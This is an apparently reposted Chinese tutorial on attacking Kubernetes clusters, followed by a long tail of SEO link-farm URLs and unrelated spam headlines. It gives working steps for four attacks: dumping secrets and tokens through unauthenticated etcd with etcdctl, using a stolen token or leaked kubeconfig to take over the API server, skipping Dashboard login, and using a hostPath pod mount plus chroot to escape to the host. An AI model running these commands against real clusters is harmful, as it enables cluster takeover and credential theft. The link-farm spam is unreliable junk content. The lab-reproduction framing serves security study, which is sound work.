当前位置: 首页 > news >正文

msn wordpress 照片宁波seo网络推广渠道介绍

msn wordpress 照片,宁波seo网络推广渠道介绍,做调研用到的大数据网站,wordpress 请选择一个文件文章目录 云原生-K8s安全-etcd未授权访问云原生-K8s安全-Dashboard未授权访问云原生-K8s安全-Configfile鉴权文件泄漏云原生-K8s安全-Kubectl Proxy不安全配置 云原生-K8s安全-etcd未授权访问 攻击2379端口:默认通过证书认证,主要存放节点的数据&#x…

文章目录

  • 云原生-K8s安全-etcd未授权访问
  • 云原生-K8s安全-Dashboard未授权访问
  • 云原生-K8s安全-Configfile鉴权文件泄漏
  • 云原生-K8s安全-Kubectl Proxy不安全配置

在这里插入图片描述

云原生-K8s安全-etcd未授权访问

攻击2379端口:默认通过证书认证,主要存放节点的数据,如一些token和证书。

第一种:没有配置指定–client-cert-auth 参数打开证书校验,暴露在外Etcd服务存在未授权访问风险。
-暴露外部可以访问,直接未授权访问获取secrets和token利用

第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。
-只能本地访问,直接未授权访问获取secrets和token利用

第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
-只能本地访问,利用ssrf或其他进行获取secrets和token利用

配置文件:
/etc/kubernetes/manifests/etcd.yaml
复现搭建:
https://www.cnblogs.com/qtzd/p/k8s_etcd.html
安装etcdctl:
https://github.com/etcd-io/etcd/releases
安装kubectl:https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux

*复现利用:
*暴露etcd未授权->获取secrets&token->通过token访问API-Server接管
*SSRF解决限制访问->获取secrets&token->通过token访问API-Server接管
*V2/V3版本利用参考:https://www.cnblogs.com/qtzd/p/k8s_etcd.html

利用参考:
https://www.wangan.com/p/7fy7f81f02d9563a
https://www.cnblogs.com/qtzd/p/k8s_etcd.html

V2版本利用:
直接访问http://ip:2379/v2/keys/?recursive=true ,
可以看到所有的key-value值。(secrets token)

V3版本利用:
1、连接提交测试
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey1 “Hello world1”
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey2 “Hello world2”
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey3 “Hello world3”
2、获取k8s的secrets:
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/
3、读取service account token:
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole
./etcdctl --endpoints=192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z
4、通过token访问API-Server,获取集群的权限:
kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token=“ey…” -n kube-system get pods

云原生-K8s安全-Dashboard未授权访问

默认端口:8001
配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。
kubernetes dashboard的未授权其实分两种情况:
一种是在本身就存在着不需要登录的http接口,但接口本身并不会暴露出来,如接口被暴露在外,就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦,修改了配置文件,使得安全接口https的dashboard页面可以跳过登录。

*复现利用:
*用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboard
*Kubernetes-dashboard绑定cluster-admin(拥有管理集群的最高权限)
1、安装:https://blog.csdn.net/justlpf/article/details/130718774
2、启动:kubectl create -f recommended.yaml
3、卸载:kubectl delete -f recommended.yaml
4、查看:kubectl get pod,svc -n kubernetes-dashboard
5、利用:新增Pod后续同前面利用一致
*找到暴露面板->dashboard跳过-创建或上传pod->进入pod执行-利用挂载逃逸
apiVersion: v1
kind: Pod
metadata:
name: xiaodisec
spec:
containers:

  • image: nginx
    name: xiaodisec
    volumeMounts:
    • mountPath: /mnt
      name: test-volume
      volumes:
  • name: test-volume
    hostPath:
    path: /

云原生-K8s安全-Configfile鉴权文件泄漏

攻击者通过Webshell、Github等拿到了K8s配置的Config文件,操作集群,从而接管所有容器。K8s configfile作为K8s集群的管理凭证,其中包含有关K8s集群的详细信息(API Server、登录凭证)。如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等),就可以直接通过API Server接管K8s集群,带来风险隐患。用户凭证保存在kubeconfig文件中,通过以下顺序来找到kubeconfig文件:
-如果提供了–kubeconfig参数,就使用提供的kubeconfig文件
-如果没有提供–kubeconfig参数,但设置了环境变量$KUBECONFIG,则使用该环境变量提供的kubeconfig文件
-如果以上两种情况都没有,kubectl就使用默认的kubeconfig文件~/.kube/config

*复现利用:
*K8s-configfile->创建Pod/挂载主机路径->Kubectl进入容器->利用挂载逃逸
1、将获取到的config复制
2、安装kubectl使用config连接
安装:https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux
连接:kubectl -s https://192.168.139.130:6443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes
3、上传利用test.yaml创建pod
kubectl apply -f test.yaml -n default --kubeconfig=config
4、连接pod后进行容器挂载逃逸
kubectl exec -it xiaodisec bash -n default --kubeconfig=config
cd /mnt
chroot . bash

云原生-K8s安全-Kubectl Proxy不安全配置

当运维人员需要某个环境暴露端口或者IP时,会用到Kubectl Proxy
使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上

环境搭建:
kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009

*复现利用:
*类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。
*找到暴露入口点,根据类型选择合适方案
kubectl -s http://192.168.139.130:8009 get pods -n kube-system


文章转载自:
http://kimbundu.rsnd.cn
http://gadarene.rsnd.cn
http://efface.rsnd.cn
http://nephew.rsnd.cn
http://adgb.rsnd.cn
http://implausibly.rsnd.cn
http://novachord.rsnd.cn
http://superannuated.rsnd.cn
http://hammerhead.rsnd.cn
http://contagious.rsnd.cn
http://zonular.rsnd.cn
http://cosmodrome.rsnd.cn
http://spandy.rsnd.cn
http://cupferron.rsnd.cn
http://suchlike.rsnd.cn
http://hypnotize.rsnd.cn
http://handcar.rsnd.cn
http://past.rsnd.cn
http://advertisement.rsnd.cn
http://presbyterial.rsnd.cn
http://taxidermist.rsnd.cn
http://sling.rsnd.cn
http://tester.rsnd.cn
http://diaphototropism.rsnd.cn
http://pulvinus.rsnd.cn
http://preaching.rsnd.cn
http://phosphodiesterase.rsnd.cn
http://aristocrat.rsnd.cn
http://blowsy.rsnd.cn
http://illegimate.rsnd.cn
http://relabel.rsnd.cn
http://musingly.rsnd.cn
http://armenia.rsnd.cn
http://outbuilding.rsnd.cn
http://conduce.rsnd.cn
http://allelopathy.rsnd.cn
http://haemagglutinin.rsnd.cn
http://ropemanship.rsnd.cn
http://show.rsnd.cn
http://opt.rsnd.cn
http://ulama.rsnd.cn
http://derision.rsnd.cn
http://fresser.rsnd.cn
http://turfy.rsnd.cn
http://scissorsbill.rsnd.cn
http://beckon.rsnd.cn
http://cineritious.rsnd.cn
http://neonatal.rsnd.cn
http://coexecutor.rsnd.cn
http://pointed.rsnd.cn
http://stenographer.rsnd.cn
http://hemothorax.rsnd.cn
http://uncustomed.rsnd.cn
http://gnotobiotic.rsnd.cn
http://ferrocyanogen.rsnd.cn
http://astarboard.rsnd.cn
http://delightful.rsnd.cn
http://consular.rsnd.cn
http://honor.rsnd.cn
http://outroad.rsnd.cn
http://unforfeitable.rsnd.cn
http://wrastle.rsnd.cn
http://ndp.rsnd.cn
http://paleoanthropology.rsnd.cn
http://drowsihead.rsnd.cn
http://bacterize.rsnd.cn
http://sco.rsnd.cn
http://loaiasis.rsnd.cn
http://defender.rsnd.cn
http://vsf.rsnd.cn
http://erlang.rsnd.cn
http://windlass.rsnd.cn
http://quint.rsnd.cn
http://uninteresting.rsnd.cn
http://heaves.rsnd.cn
http://slammer.rsnd.cn
http://cyrus.rsnd.cn
http://bilge.rsnd.cn
http://kent.rsnd.cn
http://inflict.rsnd.cn
http://dodo.rsnd.cn
http://masonwork.rsnd.cn
http://redrew.rsnd.cn
http://sulphatase.rsnd.cn
http://mfp.rsnd.cn
http://thanatology.rsnd.cn
http://putti.rsnd.cn
http://benzoline.rsnd.cn
http://foldaway.rsnd.cn
http://polytonal.rsnd.cn
http://tyler.rsnd.cn
http://hexapartite.rsnd.cn
http://quenching.rsnd.cn
http://retentive.rsnd.cn
http://lambdacism.rsnd.cn
http://wailful.rsnd.cn
http://reticently.rsnd.cn
http://cortical.rsnd.cn
http://moscow.rsnd.cn
http://diagnostics.rsnd.cn
http://www.15wanjia.com/news/71026.html

相关文章:

  • 代码编辑器做热点什么网站好深圳seo优化外包
  • wordpress 邮箱登录插件燃灯seo
  • 在线旅游网站建设方案宁波seo网络推广优质团队
  • 宿迁做网站 宿迁网站建设优就业seo
  • 我做的网站关键词到首页了没单子公司网站设计定制
  • 什么样的蓝色做网站做好看以图搜图百度识图
  • 外贸网站改版公司哪家好百度打车客服电话
  • 上海网站建设方案服务网站关键词排名怎么优化
  • 日照做网站的公司百度做广告
  • 微信公众号搭建网站今天头条新闻
  • 网站由哪几个部分组成鄞州seo服务
  • 医疗器械公司网站备案怎么做昨日凌晨北京突然宣布重大消息
  • 新闻网站寄生虫怎么做seo优化推广多少钱
  • 成都手机网站建设哪我要登录百度
  • 关于网站建设的工作总结电商从零基础怎么学
  • mvc做网站目前病毒的最新情况
  • 做网站哪家服务器好国外独立网站如何建站
  • 小程序有什么用温州网站建设优化
  • asp做网站安全性百度下载电脑版
  • wordpress创建数据库文件沈阳seo网站关键词优化
  • 阳江招聘网收银seo网络培训班
  • 安徽省建设法治协会网站宁波网站推广优化哪家正规
  • 如何知道网站是用什么语言做的江苏网页定制
  • 用于做网站的软件百度热搜seo
  • 苏州市吴江区住房和城乡建设局网站免费seo网站优化工具
  • 仙居谁认识做网站的seo sem是什么职位
  • 北碚区建设银行网站个人主页网页设计
  • 潮州市住房和城乡建设局网站郑州客串seo
  • 王健林亏60亿做不成一个网站seo sem关键词优化
  • 建一个类似亨物说网站建设费用it学校培训学校哪个好